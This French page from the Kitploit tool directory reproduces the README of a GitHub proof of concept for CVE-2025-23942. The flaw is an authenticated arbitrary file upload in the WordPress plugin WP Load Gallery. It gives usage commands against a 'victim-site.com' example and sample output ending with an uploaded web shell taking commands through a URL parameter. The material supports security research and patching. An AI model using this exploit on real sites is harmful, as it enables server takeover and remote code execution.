Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - Authenticated (Author+) Téléchargement arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-23942-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - Authenticated (Author+) Téléchargement arbitraire de fichiers

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WP Load Gallery Exploit (CVE-2025-23942)

📌 Description

Vulnérabilité de téléchargement sans restriction de fichier de type dangereux dans NgocCode WP Load Gallery, permettant de téléverser une Web Shell sur un serveur web. Ce problème affecte WP Load Gallery : de n/a jusqu'à 2.1.6.

⚠️ Détails de la vulnérabilité

  • ID CVE : CVE-2025-23942
  • Plugin concerné : WP Load Gallery
  • Versions concernées : Jusqu'à 2.1.6
  • Type de vulnérabilité : Téléchargement de fichier sans restriction
  • Sévérité : Critique (9.1 CVSS)
  • Vecteur d'attaque : Exécution de code à distance (RCE) authentifiée (Auteur+)
  • Correctif disponible : ❌ (Aucun correctif officiel pour l'instant)

🚀 Fonctionnalités de l'exploit

✅ Exploitation automatisée – Extrait le nonce, se connecte et téléverse le shell automatiquement.
✅ Vérification de version – Confirme si la cible est vulnérable avant l'exploitation.
✅ Gestion des erreurs – Assure une exécution fluide même en cas d'échec.
✅ Gestion de session – Utilise une gestion de session persistante pour l'authentification. ✅ – Fournit une sortie à chaque étape.


Retour en temps réel

🛠️ Prérequis

  • Python 3.x
  • Module requests (pip install requests)
  • Un compte WordPress Auteur+ valide sur le système cible

🔥 Utilisation

Exécutez le script avec les paramètres nécessaires :

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

Exemple :

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 Exemple de sortie

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Vérification de la version du plugin...
[+] Version détectée : 2.1.6
[+] La cible est vulnérable ! Poursuite de l'exploitation...
[+] Connexion réussie.
[+] Extraction de wplg_nonce...
[+] wplg_nonce extrait : a1b2c3d4e5
[+] Téléversement du shell...
[+] Fichier téléversé avec succès !
[+] Le shell est accessible à l'adresse : http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 Avertissement légal

Cet exploit est destiné uniquement à des fins éducatives et de recherche en sécurité. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'auteur n'est pas responsable de toute mauvaise utilisation de ce script. ( Khaled_alenazi )

Télécharger l’outil